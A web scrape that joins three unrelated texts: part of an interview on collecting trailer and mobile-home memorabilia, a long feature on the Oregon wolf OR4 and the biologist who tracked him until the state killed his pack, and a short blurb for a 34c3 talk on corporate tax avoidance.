Closen: Again, that’s part of the Jeff Foxworthy view of mobile-home living, which we had to acknowledge and deal with. We’ve traveled the country and the world. We’ve been to plenty of areas of the country where there are vehicles on blocks, refrigerators and freezers, and all sorts of things in front of a mobile home. But golly, here in Florida and in Maine, there are stick-built homes where people are doing the same thing. We drive by countless stick-built homes, where if the garage door is open, you can see it’s stacked with boxes, and all sorts of random stuff, while the vehicles are all parked on the driveway outside. The truth is mobile homes are often smaller than stick-built houses and lack enclosed garages. When trailer dwellers run out of room, their things might end up in the front yard.

Douglass Crockwell painted “Trailer Camp Friendships” for a U.S. Brewers Foundation beer ad, which appeared in the April 1953 issue of “Woman’s Home Companion.” Drinking beer at the trailer park looks like elegant, upper-middle class fun. (Via eBay)

Collectors Weekly: I guess it’s still acceptable to mock people for being poor or having bad taste.

Closen: Sadly, that’s one of those prejudices people tolerate too easily. It’s unfortunate. Some people are poor and just trying to survive. But plenty of people who are much better off are buying mobile homes, too. Even people who live in mobile homes out of economic necessity should not be burdened with the addition of that stereotype. They’re dealing with enough issues as it is.

Collectors Weekly: Is trailer memorabilia a pretty big collecting field, or are you two kind of it?

Closen: We have more of that genetic defect than most people, certainly. We collect across so many areas—we do postcards, advertising, books, and emblems—so we’ve really been bitten by the bug. But many people who do RVing or mobile-home living have a hobby that involves some sort of collecting, whether it’s the amateur radio cards or advertising from vintage magazines. There are plenty of collecting subcategories with regard to RVing and mobile homes. We just do it more broadly than most people.

The July 1960 issue of “Popular Mechanics” shows an idealized suburban family outside an elaborate mobile home. The cover story is entitled “Trailers Join the Country Club.” (Via eBay)

Collectors Weekly: It’s funny to think that people who are into compact living are also into collecting.

Closen: Some of it doesn’t take much room. Take postcards, for example. It’s sometimes called shoebox collecting because a 3×5 postcard is the perfect size to fit in a shoebox. You can take a standard shoebox and fit 500-1,000 postcards into it. A sizable collection of postcards can be housed in a relatively small space. People tend to specialize. They collect postcards about a particular, narrow topic. Another example is matchbook covers; you can also store a lot of them in a small area.

Collectors Weekly: In the book, you also show vintage company placards or emblems that would be attached to the vehicles.

Closen: Those are tougher to get, of course, because those are permanently affixed to the coaches. But if you can find a salvage yard, you might come across a few. A lot of people have been savvy enough that if a coach has been damaged in a storm or an accident, before they let it go to the junkyard, they’ll pull off the emblems. Those things can be highly valuable. That is another field of collecting that may or may not take up a lot of space. Some of those things are large, but a lot of them are relatively small.

A vintage linen postcard of Willow Trailer Park in Long Beach promises clean palm-lined streets and a leisurely California lifestyle. (Via eBay)

Collectors Weekly: Since you collect a broad range of objects, how do you hunt for your collectibles?

Closen: We use all the standard sources—antique stores and malls, flea markets, estate sales, and eBay. Yard sales and garage sales can sometimes have treasures about RVing and mobile homes. It’s hit and miss, but going on the hunt is part of the fun. If you go to a postcard show, the dealers have their cards alphabetized by subject—it’s absolutely remarkable. Some dealers laugh at me when I ask about RVs and mobile homes, but a lot of them have collected cards on those topics. We also go to toy stores and see if they have any modern models of RVs or mobile homes. There is a huge amount of Airstream toys and models on the market. We’ve got three or four display cases here in the house full of Airstream stuff.

This 1950s tin toy, made in Japan, features a fully detailed interior of a “house trailer.” (From Don’t Call Them Trailer Trash, courtesy of Schiffer Publishing)

Collectors Weekly: Why do you think Airstream has become hip while mobile-home living is generally mocked?

Closen: The Airstream trailers were born out of the stylish Art Deco Streamline Moderne movement. Today, no other trailer or mobile home is made like they are. Back in the ’40s and ’50s, a couple of other companies, like Spartan and Vagabond, were also building the aluminum silver-bullet, airplane-fuselage-looking trailers, but those companies didn’t survive. Airstream has survived, and they’re so well-made, roadworthy, and aerodynamic. When you shine them up, they’re remarkable. If you were to go to an RV dealer and look at the new ones, they are just magnificent inside—bright, clean, and well-designed. Even the 2017 model looks fantastic. The shortest, little, tiny Airstream is at least $60,000 or $70,000, while the medium and larger ones are well over a hundred thousand dollars for a trailer—often more expensive than buying a stick-built house. They’re so iconic and good-looking that the Museum of Modern Art in New York has an Airstream in its collection. We’ve written an entire book on Airstream, the only book out there on Airstream memorabilia.

Streamline was a brand of Modernist airplane-fuselage-style trailers that competed with Airstream. The line was featured in the October 1963 issue of “Trail-R-News.” (Via TomPatterson.com)

Collectors Weekly: Speaking of unconventional homes, in the book, you say houseboats are also a form of mobile homes.

Closen: We were trying to be a little cute. People have tried a lot of alternative living spaces. Years ago, Winnebago decided it was going to build a mobile home in a helicopter. You’d sit the copter down, and it had an awning you could pull out. Obviously, that was a gimmick. Yes, a houseboat can be sort of a mobile home, if it’s self-contained and has water, electric, sewage, and kitchen facilities. You see those around Seattle, San Francisco, and other waterfront communities. Today, HGTV has shows about water-living people, who build homes that sit in marinas. They can be quite expensive.

Collectors Weekly: What are the other comparable lifestyle trends today?

Closen: I’m a big fan of HGTV, and I’m seeing this tiny-house craze that’s going on in San Francisco and other places. TV audiences are fascinated by all the people who are willing to try to live in 200 or 300 square feet. That was the size of my college dorm room, and when I think back on those years, I wonder, “How did I survive graduate school in that room?” In a way, we’re almost coming full circle here. A bunch of the tiny housers are living in less square footage than would’ve been available to servicemen post-World War II. Unlike the veterans, many of them have other options, but they’re choosing to live in a tiny house to embrace a simple, minimalist lifestyle. I think the tiny-house lifestyle is going to be tough for people with kids or people who want to have kids. There’s just not enough space for children in most of those homes.

The manager of Pine Shores Trailer Park in Sarasota, Florida, sent this shuffleboard postcard to entice a Maine citizen to winter there in 1949. He promised a new large bathhouse, modern laundry, improved electrical and water systems, an attractive recreation hall, and fishing. (Via eBay)

Collectors Weekly: Why don’t they just move into mobile-home parks?

Closen: While young people are embracing the tiny-house movement, for the most part, they don’t want to adopt the trailer-park lifestyle. In the past few decades, mobile-home parks have tended to be occupied by people who are older or retired. Part of that is because a lot of these people have more than one home, of course. Mobile-home living is affordable enough that you can have a home in two or three places, including a warm location near a beach.

Collectors Weekly: It strikes me that mobile-home parks have a lot of potential as singles communities.

Closen: To my knowledge, there haven’t been any organized singles mobile-home parks. But what happens is that, as people age, a husband or wife passes on. So you’ve got a lot of elderly but single retired people moving into mobile-home parks in Florida and the other warm-weather places. There, some elderly people will partner up because they don’t want to live alone at that stage, and I don’t blame them. It happens all the time.

The Pacific Palisades Trailer Bowl near Santa Monica, California, boasts a glorious ocean view for its 174 lots. This vintage postcard talks about its adults-only community, which also offered a heated pool, shuffleboard, private phone connections, and underground utilities, including natural gas. (Via eBay)

(In addition to “Don’t Call Them Trailer Trash: The Illustrated Mobile Home Story,” Michael Closen and John Brunkowski have published six other books about RVs, trailers, and mobile homes including “Airstream Memories,” “KOA and the Art of Kamping,” “Amateur Radio Goes Camping & RVing: The Illustrated QSL Card History,” “Pictorial Guide to RVing,” “RV & Camper Toys: The History of RVing in Miniature,” and “Camper & RV Humor: The Illustrated Story of Camping Comedy.”)


A Very Old Man for a Wolf

It’s the nature of the wolf to travel. By age two, wolves of both sexes usually leave their birth packs and strike out on their own, sometimes covering hundreds of miles as they search for mates and new territory. Whatever the reason, when wolves move, they do it with intent—and quickly. Humans don’t know how they decide which way to go, but the choice is as important as any they’ll ever make.

One day in 2005 or 2006, a young, black-furred wolf in Idaho decided to head west. He swam across the Snake River to Oregon, which at the time was beyond the gray wolf’s established range. By entering the state, he walked out of anonymity and into a form of local celebrity, becoming notorious over the next few years for his bold raids on livestock and his enduring competence as a hunter, father, and survivor.


In Oregon, that male met another long-distance traveler from Idaho, a silver-gray female. This wolf had been collared by Idaho state biologists, who knew her as B300. She was born to the Timberline Pack, north of Idaho City, and it’s possible to trace her ancestry back to the state’s formal wolf reintroduction in 1996. Her great-grandmother was B23, a black wolf who was born in northern British Columbia and who dined as a pup on moose and caribou in the boreal forest. B23 was captured and moved in January of 1996 to Dagger Falls, in Idaho’s Frank Church River of No Return Wilderness. She would give birth to almost 30 pups before she was killed by federal wildlife officials in 2001 for killing a calf.

In the summer of 2006, when B300 was collared, she was probably already feeling restless. In September, two members of her pack were shot by wildlife officials after they killed a sheep and a dog. By late fall, she’d made the choice to strike out on her own. She too went west and crossed the Snake into territory as yet unclaimed by wolves.

The black wolf and B300 mated for the first time in December of 2006 or 2007—nobody knows when exactly. They settled in the high timber of the Wallowa Mountains, a kingdom of pines and wildflowers and cow pies that curves like a palisade around the agricultural communities of Joseph and Enterprise. They made a den inside a huge felled ponderosa and cared for their first round of pups, born blind and helpless in early spring. They were now officially a pack, the first to exist in Oregon for nearly 60 years.


The black wolf and B300 had been preceded by a few other wolves in Oregon, but they were the first to establish roots and start breeding. A male showed up in 1999, and its existence so perplexed state officials that they captured it, put it in a crate, and sent it back to Idaho. Still, everybody knew deportation wouldn’t work in the long run. Wolves were inevitably going to return.

Eventually, the Oregon Department of Fish and Wildlife (ODFW) hired a biologist to deal with this trickle of immigrants: Russ Morgan, a lifetime wildlife manager and backwoodsman based in La Grande. While the black wolf was busy slaying elk in the Wallowas to feed his new pups, Morgan was driving the back roads of eastern Oregon at night, literally howling into the dark, looking for wolves.

Morgan, now 54, is a tracker and a hunter, by trade and spiritual avocation. He grew up outside of Bend, going after lizards with a BB gun. His native ecosystem is the juniper and sage high desert of central Oregon, a beautiful place to learn the ways of nature. He would ramble all day in the bush and come home for dinner covered in juniper pitch.

For Morgan, hunting is not about killing and winning, but rather being part of what he calls “the goods and hardships of nature.” Hunting isn’t a sport for him. There’s a lot of care and focus and silence involved when he goes into the woods with a game tag. He typically hunts elk with a longbow and makes his own arrows.

Oregon is a vast territory for a solo wolf tracker, and the new pack produced two rounds of offspring before Morgan caught up with them. Each time, the pups remained in the den for a month or so, tiny and clumsy at first, then increasingly playful and bold. Their mother would stay close, nursing and minding them, even consuming their urine and feces to keep the den clean until they were big enough to go outside. Meanwhile, her mate kept her fed. Eventually, both parents would return to the hunt, bringing food back in their bellies, which they’d throw up as a steamy stew for the pups to eat—a technique biologists call “regurgitative provisioning.”

By three months, the pups were ready to learn the basics of hunting from their parents and older siblings. By nine months, the most adventurous were ready to leave. Others might stay with the family for up to four or five years, helping hunt and care for younger siblings before deciding to strike out on their own. In essence, a wolf pack is a family, often with aunts, uncles, grandparents, and multiple generations of pups worked into the mix.

In 2009, a field team of fish biologists doing a stream survey sent Morgan a cell phone recording of barking and howling. Morgan knew wolf sounds when he heard them, so he drove to the site and started tracking the pack’s prints and scat. Before long, he was able to trap the gray female and collar her with a VHF radio transmitter. Idaho’s B300 became Oregon’s OR2. Now Morgan could monitor the pack from the comfort of his truck, driving around Wallowa County with a portable receiver.

The 2 in OR2 means she was the second wolf collared in Oregon. A male designated OR1, who had a companion—probably a sibling—had been collared in eastern Baker County a few months earlier. When the duo began killing livestock—slaughtering at least 20 sheep in one night—and didn’t respond to deterrents like a collar-activated noise box, the ODFW decided they had to be destroyed.

At this point, decisions about hunting down a wolf were entirely the prerogative of the agency. So Morgan made the call, guided by an ODFW document called the Wolf Conservation and Management Plan, a bureaucratic blueprint that codified how this newly returned symbol of all things wild was to be handled in a landscape of cattle, timber, rock climbers, rivers thick with rafts, and hikers.

About a month after OR2 got her new name and collar, she and the black male, along with their pups, were eating an elk carcass that lay partially submerged in a minor stream called Grouse Creek, about ten miles from Hells Canyon—the deepest river gorge in North America, which separates Oregon and Idaho. Wolves keep to the high ground, as a rule; Morgan calls them “ridge walkers.” But their long, drawn-out pursuits tend to follow gravity downhill, and a lot of prey end up in the bottom of a valley or draw, exhausted, wet, and doomed.

Morgan and a friend hiked down to the creek and saw what Morgan describes as “a whole wad of wolves blowing out.” The female and the pups fled, but the big male stopped 30 yards away from the carcass and turned to face them, howling, barking, and growling. He was black as a starless night and in the prime of his youth.

“He just lit up,” Morgan recalls. “He was so loud you couldn’t hear yourself think.” Morgan pulled out his digital camera and took a few pictures. The wolf ran off.

Man and wolf would meet many times. Sometimes Morgan would count his pups. Sometimes he would chase him with a rifle loaded with tranquilizers, other times with a rifle loaded with bullets. Over the next seven years, they would start turning gray together.


Six months after their first meeting, on February 12, 2010, the black male got a collar and a name. Morgan used the signal from OR2 to track the family by helicopter. When he found the wolves, he had to try and pick the alpha male out of a half-dozen adult-sized wolves coursing through the rocky defiles of Road Canyon in lower Grouse Creek, just a few miles from the elk site. It was easy enough to spot OR2, and she had a companion running beside her, keeping close. Morgan figured he’d found his alpha.

Wolves are so fast—they can do bursts of 38 miles per hour, ten miles per hour faster than Usain Bolt—that Morgan’s helicopter pilot struggled to keep up, while Morgan, leaning out the door, tried desperately to get a clear shot at the alpha’s rump. Suddenly, the big black wolf tripped over brush and rolled in a somersault. When he righted himself, he sat down and started barking and howling at the chopper, inadvertently concealing his backside.

OR4, the Imnaha wolf pack's alpha male, after being refitted with a working GPS collar on May 19, 2011. (ODFW)

“When he flipped over, I could see the rotor wash flattening his hair,” Morgan says. “He was frustrated. He gets pretty frustrated when he is being chased.” Finally, the wolf stood and Morgan got a shot off. Darted, the animal slowed, sat, and then went to sleep in the snow. The terrain was too steep to land, so the pilot dipped into the ravine, where Morgan stepped out with his kit. The helicopter took off, and Morgan shared a moment with the unconscious alpha. As he weighed him—115 pounds, the largest wolf ever recorded in Oregon—took blood samples, and affixed tags and a collar, the black wolf officially became OR4, a wild animal with a name. A wild animal with his DNA on file.

OR2 wasn’t happy about any of it. She stood a couple hundred yards away while Morgan worked, howling continuously.


The Wallowa Valley, cradled by mountains, was once the home of the Wallowa band of the Nez Percé, and one of its two principal communities is Joseph, named after Chief Joseph, or Hinmatówyalahtqit—Thunder Rises as it Goes. There’s a statue of Chief Joseph in town, and there’s a rodeo named after him, but his descendants are based out of the Colville Indian Reservation in eastern Washington, with the members of 11 other tribes. They were forced to move by the U.S. Army in 1877 so white men could raise livestock here.

“We were like deer. They were like grizzly bears,” Chief Joseph wrote in his autobiography. “We had a small country. Their country was large. We were contented to let things remain as the Great Spirit Chief made them. They were not; and would change the rivers and mountains if they did not suit them.”

The white men built roads, mines, and mills; they divvied up leased federal land for grazing. Today, a quarter of the jobs in Wallowa County are in agriculture or timber, and much of the work involves running cattle or growing hay. During the first few decades of the 20th century, ranchers eradicated the grizzly bear and wolf to make the land safe for livestock. The last known griz was spotted in the western Wallowa Mountains in 1938. The last wolf bounty paid out in Oregon was in 1947.

Sixty years isn’t such a long time—it’s the average age of a Wallowa County rancher—yet perhaps the return of wolves to Oregon would have gone over better if it had taken 200. As it was, only a couple of generations had passed. To the children and grandchildren of the old wolf slayers, reintroduction seemed like an insult. “It tells them that their heritage was wrong,” Morgan says, “that it was a mistake to make those wolves go away.”

Russ Morgan on a tour of OR4's old stomping grounds. (Emma Marris)

So OR4 was already on the wrong side of the local ranching community, just by existing. It didn’t help when he and other members of the pack—called the Imnaha pack, after the Imnaha River at the core of their territory—were drawn closer to the world of man by bone piles.

Most ranches have bone piles, or dead piles, which are central locations for piling up the carcasses of dead livestock, since burial requires using heavy machinery. By 2010, the Imnaha wolves were lingering at these places, playing with hides, chewing on leg bones, and generally luxuriating in the cozy atmosphere of decaying mammals. And then they started to look around at the placid creatures on the hoof nearby, so much less dangerous to pursue than elk, which can break a wolf’s jaw or rib with a muscular kick.

OR4 and OR2 had what was probably their third litter of pups in April of 2010. There were at least four. These arrivals joined roughly eight other offspring, now all full-sized and actively hunting. The family was getting big.

Data from Yellowstone suggests that every wolf will kill, on average, two elk per month in the winter. Each elk is generally taken down by two or three wolves. Wolves’ teeth are surprisingly blunt instruments; they often kill by inducing massive internal bleeding. A cougar pounces on its prey and kills it instantly by breaking its neck or slicing open a carotid artery, but a wolf chases an animal until it collapses, then basically beats it to death with its jaws.

Once the elk is down, the wolves unzip it, and first eat the heart, lungs, liver, intestines, spleen, and kidneys. Then they get to work on the meaty legs. Each wolf requires at least seven pounds of food per day, so a good-sized pack needs to kill an elk every two or three days.

Keeping up with this pace of consumption demands endurance. One day in the spring of 2010, when OR4 was in his prime, he killed an elk 33 miles from his den and then ran home in six hours, his belly full of meat to throw up to feed his pups. That meant a 66-mile round trip in rough country—with a vigorous elk hunt in the middle.

In the spring and summer, when the snow has melted and elk have left the hills, wolves diversify their diets, eating deer, rodents, and whatever else they can get. Pickings are slim, except down in the valleys, near all those irresistible bone piles. In early spring, when the pups are hungry, much of the game is found in lowland pastures, sharing grass with cattle. The pack killed its first calf on May 6, 2010. By the end of May, five were dead.

But just as the ODFW began handing out permits to local ranchers allowing them to shoot stock-killing wolves on sight—and calling the U.S. Agriculture Department’s Wildlife Services, the agency that specializes in killing vermin and problem predators—the pack changed its tactics and retreated to the mountains. Everything got quiet for a while. OR4’s collar went dead. The snows came and went. More pups were born.

The next year, in May of 2011, the pack—now totaling about 15—started killing calves again, and the ODFW decided to kill two members to reduce the number of mouths OR4 had to feed. ODFW staffers set out traps and went on the hunt with guns. One of OR4’s sons was trapped and killed; a daughter was shot.

By this time, Morgan knew OR4’s own distinctive paw print: the wolf’s left hind foot had a broken toe that stuck out 90 degrees. Morgan found this print and set a trap directly on top of it. As he thought might happen, OR4 himself was caught. Because he was the breeding male, his life was spared, but Morgan took the opportunity to knock him out with a “jab pole”—a tranquilizer on a stick—and outfit him with a working collar, this one equipped with GPS. The state of Oregon began to download OR4’s whereabouts four times a day.

For the next five years, the ODFW often knew exactly where he was, to within 100 meters. But there were gaps, because OR4 was very hard on collars. He probably banged them against rocks and logs during chases, maybe took an occasional elk hoof right in the neck. Some of his collars didn’t last a month.


In an attempt to pacify angry ranchers across the West, the conservation group Defenders of Wildlife established a fund in 1987 to compensate producers who lost animals to wolves—but only if a state agency ruled that the death was clearly caused by one. Later, the state of Oregon set up its own fund.

Morgan was integral to this system. He started posting official reports of his depredation investigations after local ranchers began to contest his findings. OR4’s file grew thicker and thicker. Over time, as the workload got to be too much, Morgan took on an assistant: Roblyn Brown, a methodical, capable field biologist with a passion for advanced data analysis. She became his heir apparent as wolf coordinator.

Sometimes, the kills Morgan was called out on were old, especially when the victims were animals out grazing on public land. One report reads: “The carcass had been mostly consumed by scavengers, with sign of wolves, bear, and coyote present. The carcass consisted mostly of bones and a large piece of hide, with muscle remaining for examination only on the head, neck, and lower legs.”

This kill was ruled “probable wolf” because of the cow’s location in a dry rocky creek bottom. There were signs that it had been chased downhill, and purple bruising on the carcass indicated hemorrhaging under the skin before death—from those crushing, blunt teeth.

Sometimes the kills were fresh, the evidence overwhelming. One morning in December of 2012, a rancher heard the alarm sound on a telemetry receiver that Morgan had given him, to alert him when OR4 was in the area. But he didn’t need the box. He could hear the wolves howling, and when he found a dead cow, it was still warm. It had run for a half-mile before being taken down, and Morgan noted “blood and rumen smears on the ground, blood stains on the vegetation, hair tufts, muscle fibers, and vegetation and soil disturbances.” He ruled it a confirmed wolf kill.

Some deaths were mysteries, like this one from September of 2011: “Carcass was mostly intact; there was no sign of injury (broken bones) or marks on the outside of the cow. Maggots were present in large numbers. There was scavenging (coyote tracks were present) on the right side of the head and around anus. There was no evidence of a predator attack. The cause of death of the cow is unknown, but unrelated to predation.”

No matter what Morgan found, and despite the fact that wolf losses represented a tiny fraction of livestock mortality, the ranchers stayed angry. This took a toll. Morgan would come home from work to his partner, Dana, a wildfire emergency coordinator who’s now his wife, eat dinner, make some arrows, go to sleep, and head back to work the next morning without speaking a word.

Morgan didn’t just investigate depredations; he orchestrated a multi-pronged deterrence campaign. He outfitted ranchers with alert systems linked to OR4’s collar, so they could defend their livestock. He spent many a day and night up on a hill with the telemetry setup, helping haze wolves that were heading down into the valley. In 2010, he started working to do away with bone piles. Today, the Wallowa County landfill takes cattle carcasses for free.

Despite his efforts, in the fall of 2011, OR4 and his family killed once too often, a calf taken down near Griffith Creek on private land. It belonged to Todd Nash, the Oregon Cattlemen’s Association wolf committee chairman and a longtime opponent of wolf reintroduction. “Blood from the calf was scattered over a large area both inside and outside an old broken-down corral,” the report read. “Within the corral were multiple areas of blood, hair tufts, and sign that the calf had gone down (and then back up) at least once before its death.”

GPS data placed OR4 at the scene. According to the wolf plan, chronically depredating wolves were to be killed, even though wolves were still on the state endangered species list. Though the vast majority of the food OR4 was eating was wild game, he was killing stock often enough that “chronic” seemed like the appropriate adjective. He had to go.


When Morgan applied to be Oregon’s wolf coordinator, he had already been a wildlife manager for 20 years. He’d captured cougars and counted fish and blocked development that threatened a rare ground squirrel. He knew wolves would be controversial. But he believed in the wolf plan—a document that doesn’t do one thing that many environmentalists wished it would: take on the institution of grazing on public lands. This practice is as hot a potato as you can find in the West, up there with who gets water and how much timber to cut. The ODFW Commission, which wrote the plan, explains in the preamble that it has no authority over grazing issues. The overall goal was “to ensure the conservation of gray wolves as required by Oregon law while protecting the social and economic interests of all Oregonians.” It aimed to be a compromise. “Non-lethal and lethal control activities actually may promote the long-term survival of the wolf by enhancing tolerance,” the commission wrote. Put another way: the price of having wolves is killing wolves.

It was this plan that Morgan now carried out. Using the coordinates from OR4’s collar, he determined that the wolf was hunkered down in a thick stand of small pines, not far from a forest road, probably waiting out a rain shower. Morgan put his rifle on a bipod uphill from the stand and sent Brown around the back to flush the wolves toward him. He heard movement—wolves approaching. He rotated his head to scan down the face of the pines, and when he looked back, OR4 was standing right in front of him, completely exposed. But the wolf didn’t stay still long.

“Just as I was getting the crosshairs on him, he vanished,” Morgan says.

Brown emerged from the pines and they set up for another try, getting ahead of the collar signal, which was now moving down a canyon. It was drizzling and cloudy. Morgan had kind of a “sick feeling” as they sat there, then Brown checked her phone. There was a text message: “Stand down. Judge has issued a stay.”

Three environmental groups had sued to stop the ODFW from killing OR4. Their central claim was that the state could not legally kill an animal on the Oregon endangered species list. They also convinced the Oregon Court of Appeals to issue an emergency stay while their suit went forward. A stay like this has to be based on some “irreparable harm” that will occur if it’s not put in place; since wolves don’t have legal standing, it was granted in part to prevent irreparable harm to the members of the three environmental groups, who would be denied “the ‘profound and exhilarating’ experience of viewing wolves in the wild, including the particular wolves targeted for killing.”

OR2, the longtime mate of OR4. (ODFW)

Morgan is a believer in the idea that wild animals must be managed as populations. “I try not to get emotionally involved with particular individuals,” he says. “If that wolf had come out in a place where we could have pulled the trigger, we would have pulled the trigger. You have to focus on the task at hand and get it done, desensitize yourself. One of the things we’re thinking is that wolves are going to be OK in Oregon, and this is part of management. It is what we signed up for when we did the wolf plan.”

With OR4 and his pack safe for the time being, Morgan continued to investigate depredations and tried to keep a working collar on his alpha. Life went on. OR4’s pups grew up and left home. One of his sons, OR7, traveled all the way to California in December of 2011, briefly becoming an international celebrity. Another, OR9, went to Idaho and was shot by a hunter with an expired wolf tag. A third, OR33, was found shot to death near Klamath Falls, Oregon, in April 2017. A fourth, OR12, took over the remote Wenaha pack in 2012 and is still the breeding male there.

A fifth, OR3, disappeared in 2011 and was presumed dead. But in the summer of 2015, he showed up on a trail camera in Klamath County, hundreds of miles to the southwest. He found a mate, and they had a single pup. When the pup was about six months old, a poacher killed OR3’s mate. Now the father and son are believed to live together near Silver Lake, in Lake County.

As for OR4, in March of 2012, he was tranquilized from a helicopter again and re-collared. Every spring, new pups were born; every year, older offspring dispersed. The pack dined mostly on elk, but occasionally on calves.

In May of 2013, the lawsuit that prompted the stay on OR4’s death sentence ended with a settlement agreement among the environmental groups, the state, and the Oregon Cattlemen’s Association. New rules were incorporated into the wolf plan. The threshold for killing a wolf was explicitly spelled out, and it would get lower and lower as the wolf population expanded. While there were still fewer than four breeding pairs in the state, they would be managed under “Phase One” rules: a wolf could be killed if a pack was implicated in four depredations within six months and if non-lethal control attempts had already been tried.

After these changes were in place, the Imnaha pack somehow skirted the line, never quite taking enough livestock to earn a death sentence. Ranchers joked that the wolves kept a copy of the settlement posted inside the den.


A few months after the settlement, OR2’s collar went dead. She was never seen again. In February of 2014, OR4 got his fourth collar. Every time he was darted from the air, he seemed smarter. It was getting harder and harder to bring him down.

“We—humans—collar lots of animals,” Morgan says. “Mostly because we are trying to learn. We collar wolves for a different reason—because we are fearful. We want to keep track of them. That is fundamentally different than trying to understand them.”

By 2014, OR4 was an old wolf, largely gray. His teeth were worn. He had sired more than 30 pups. OR2 was gone, and he was now seen with a female that had an obvious limp. Yet he carried on.

And then, in January of 2015, the rules changed again. Annual counts indicated that there were officially enough wolf breeding pairs in Oregon for the wolf plan to move to a new phase. Now, the ODFW could authorize lethal control at the request of a property owner or rancher with a permit to graze on public land after just two depredations in a row.

This time, the Imnaha pack got on the wrong side of the rules in a hurry. In the spring of 2016, the pack—now down to four animals—killed a 500-pound steer calf in the Upper Swamp Creek area. The same day it happened, Brown saw OR4 and his mate, nicknamed Limpy, from a helicopter over the Zumwalt Prairie, a favorite hunting ground. Neither wolf had a working collar, so she loaded up her rifle with a tranquilizer dart.

OR4 didn’t run. Two years earlier, Brown had collared him and he ran across the ground “like the wind.” Now he just loped across the landscape, turned, and barked twice.

Brown pulled the trigger ruefully. She and Morgan had talked about their reluctance to collar OR4 again, but with the animal in sight, her duty was to act. No wolf in the pack was collared. He was right there. Later, when Morgan got a text from Brown that OR4 had been fitted with his fifth collar, his heart sank. The noose was tightening.

A few weeks after the new collar went on, the pack killed a ram. Then a calf. And then another. And then another ram. At this point, they had blown past the minimum depredations for lethal control. On March 25, 2016, the ODFW received an official request from a rancher to have them killed.

On March 31, Morgan, his bosses at the ODFW, and his staff held a meeting. The consensus was that the rash of depredations and collar signals from the valley floor suggested that an aging OR4 was going after easy targets and would probably continue to do so. It was even possible that a younger and stronger wolf had pushed him out of his core territory. It was clear to everyone that, under the wolf plan, OR4, his mate, and two offspring that made up his current pack had to go. Morgan made the official recommendation.

“It is not retribution or justice,” Morgan says of the decision. “It is solving a problem.”

OR4’s ancestors didn’t ask to be relocated to the lower 48. And while gray wolves have arguably restored a lost component to western ecosystems, they returned to a place much changed—a place full of people, of fat hornless cattle, of snack-sized sheep, of rubber bullets and range riders and firecrackers and helicopters and tranquilizers and traps and collars and GPS signals and government regulations. OR4 never failed as a wolf. He broke human rules. And in the 21st century, being a competent wolf isn’t enough to stay alive. You must also—impossibly—know your place.

Since there were already ODFW staff in the area with a helicopter, Morgan left it to them to kill the wolves. OR4 was old; his mate was limping; they had fresh GPS collars transmitting their whereabouts. It wasn’t hard to find them. ODFW staff herded them out of a steep drainage canyon, thick with timber, into the open. The young wolves split off, and neither of them had collars, so the crew pursued them first. Once they were both dead, the staff relocated OR4 and Limpy. The pair ran from the helicopter, their speed limited by the female’s injury. The people hunting them down were firing buckshot loads. They flew directly above the wolves and shot each one in the head. Within two hours of the official decision, the entire pack was gone.

OR4 was probably a month shy of his 11th birthday—a very old man for a wolf.


The wolves’ bodies were collected. OR4 was still heavy, his head robust, rounded, and gray. “You could tell he was an older, dominant-type wolf,” says the man who carried him, who asked not to be identified. They were loaded into a cargo net and taken back by helicopter. Next, the carcasses were displayed to the local sheriff—a protocol put in place because of the lack of trust between the state agency and local authorities, and a ritual Morgan found repellent. Then staffers brought the dead wolves back to the ODFW offices in La Grande. All their collars and tags were removed.

A backhoe was used to dig a grave for the four wolves. But first, Morgan collected OR4’s skull. Wolf skulls, bones, and pelts are often collected for research and education. In this case, Morgan also believed the skull of such a historically important wolf should be preserved at the ODFW headquarters in Salem. For him, saving it is a deep mark of respect.

After OR4 was killed, Morgan got a condolence note from Todd Nash. It read: “I will have to admit, I was hoping OR4 would die of old age. After all, he was just a wolf trying to make a living, and I admired that.”

Nash didn’t hate the wolf. He hated the reintroduction effort. KPIC Channel 4 of Roseburg, Oregon, called him for a response to the killing. “We spend so much money trapping, collaring, and helicopter guarding, and one thing and another,” he told the reporter. “Then they end up killing the darn things. Because we can’t coexist with them. That’s the plain and simple fact. This pack should have been removed a long time ago.”

OR4 was a dominant leader, a skilled hunter, and an excellent father, according to Morgan. Seven of the state’s 17 packs have alphas that are his sons, daughters, or granddaughters. OR4's descendants also founded California’s first wolf pack since the 1920s—the Shasta pack. Above all else, the big black wolf was supremely competent. “He epitomizes all things wolf,” Morgan says.

A few days after OR4 was killed, Morgan’s partner, Dana, went to the hospital with a blood clot in her shoulder. As he sat with her, Morgan’s heart began racing. A passing doctor took a listen and hustled him into the emergency room. It wasn’t a heart attack, just some kind of transitory tachycardia. Doctors told him to avoid stress.

After a few months spent mostly at his desk, working on a revision of the wolf plan, Morgan retired on September 15, 2017. He described himself as being “tired of the negativity and heartache that is wolf management in a modern world.”

Brown has taken over as acting wolf coordinator. On her computer screen is a map of the most recent whereabouts of the 15 or so collared wolves in the state of Oregon, like a flight-control display for Canis lupus.

On Morgan’s last outing into the field before his retirement, he visited the den that belonged to OR4. The den itself is a huge ponderosa pine log, hollow from one end to the other. At one time, 15 wolves would have called this place home. On this summer day, the clearing was still.

Morgan pulled out a coarse gray wolf hair snagged on the log. There was some old scat still among the lupines and wild strawberries, and a sprinkling of bleached bones. “I don’t have any remorse for killing them, but I am sad they aren’t here,” he said.

Before he left, he picked up an elk skull from the clearing. He placed it firmly in the center of the den’s opening. And then he walked away.

Emma Marris (@emma_marris) is the author of Rambunctious Garden: Saving Nature in a Post-Wild World. This story was supported by a grant from the Institute for Journalism and Natural Resources. Marris lives in Klamath, Oregon. 

Illustration by Molly Mendoza (@msmollym)

Taxation – Explaining What a Double Irish Sandwich Is

$
0
0
media.ccc.de - Taxation


Taxation, the most "boring" #34c3 talk, but hey, it's the economy, stupid, and you pay for it! We will provide a quick overview of the international taxation system, explaining what a Double Irish Sandwich is, why international corporations like Google pay only 2.4% in taxes, and how your favourite tech companies (Google, Amazon, Apple, Microsoft, ...) evaded billions in taxes. This tax-dodging costs the European Union more than $50 billion. Annually. We put these numbers into perspective, and explain why you pay more.
And how you should discuss the topic, since it defines what our society will be.

You might have heard about #LuxLeaks, #PanamaPapers, or other frivolous tax activities. This talk gives an overview of one of the most urgent policy issues: legal tax loopholes for big corporations, how big their scale is in relation to your own tax rate (across Europe), and why it should concern you. After all, you pay for it. And why you should get active. We will present the launch of a Europe-wide anti-tax-evasion campaign at the beginning of May 2017.

